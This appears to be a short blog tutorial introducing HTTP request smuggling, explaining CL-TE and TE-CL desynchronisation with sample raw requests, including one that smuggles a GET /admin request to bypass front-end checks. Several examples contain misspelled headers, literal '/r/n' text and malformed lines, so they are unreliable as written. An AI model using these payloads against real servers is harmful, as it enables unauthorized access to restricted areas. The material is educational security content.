Let’s talk about Http Request Smuggling
Http Request Smuggling is a vulnerability that has existed since 2005, and it explores ways to make http requests to servers, in order to obtain access or information that should not be accessible by the user.
Simply put, in an environment with multiple servers between the user and the target application, there are ways to handle requests from requests in order to induce the server to provide us with what we want.
How it works?
We will use, for example, a simple request:
POST / HTTP/1.1
Host: test.com
Content-Lenght: 10
user=admin
When the server receives this request, the server processes it and responds by sending the requested resources; however, what if the server receives multiple requests?
POST / HTTP/1.1
Host: test.com
Content-Lenght: 10
user=admin
POST /users HTTP/1.1
Host: test.com
Content-Lenght: 8
role=dev
When receiving several requests in the same TCP packet, the server needs a way to limit the beginning and end of the request, using, for example, the “Content-Lenght” header, which indicates in bytes the size of the request body.
POST / HTTP/1.1
Host: test.com
Content-Lenght: 10
user=admin
Another way to verify is to send the header “Transfer-Encoding: chunked”, which divides the body into chunks divided into bytes, until the server finds the value 0.
For example:
POST / HTTP/1.1
Host:test.com
Trasnfer-Enconding: chunked
6
user=a
4
dmin
0
So, if we send both headers in the same request, we can induce the servers to respond to each part of the request.
POST / HTTP/1.1
Host:test.com
Transfer-encoding: chunked
Content-Lenght: 14
/r/n
/r/n
0
name=admin
Where 0 indicates the end of the chunk and the header “Content-Lenght” refers to the value: “name = admin”.
In network environments with Front End and Back End servers, each one can be configured to work with a different type of header. It means, if the Front End server works with the “Content-Lenght” header and the Back End server works with the “Transfer-Enconding” header, each one will read the specific part of the body on the request where the headers limits are. So we can manipulate the servers and get some advantage, like authentication bypass or access to restricted data, for example.
So, if we use this technique, we can create something similar to:
POST / HTTP/1.1
Host: test.com
Transfer-Encoding: chunked
Content-Lenght: 12
0
user=test
GET /admin HTTP/1.1
Host.test.com
Content-Lenght:5
x=
We will be able to access an admin area, previously not allowed. Once the Front end server processes the part of the body referring to the configured header, the Back End server will process only the content related to the body of its header, responding to the request and bypassing the checks for access to the “admin” path “.
The most common ways for this attack are:
CL-TE: When the Front End Server uses the “Content-Lenght” header and the Back End Server uses “Transfer-Enconding” header.
TE-CL: When the Front End Server uses “Transfer-Encoding” header and the Back End Server uses “Content-Lenght” header.
Of course, there are several ways to adapt the technique used, depends on what you will find on the target.
There are also some tools and plugins that can help you look for this vuln, such as the extension “HTTP Request Smuggler”, present in Burp Suite. It automates the search and makes the start of the exploration more assertive. After the results, we can adjust the payloads in order to be able to explore the vuln.
This was just an overview of Request Smuggling, an “obscure” but very interesting technique.
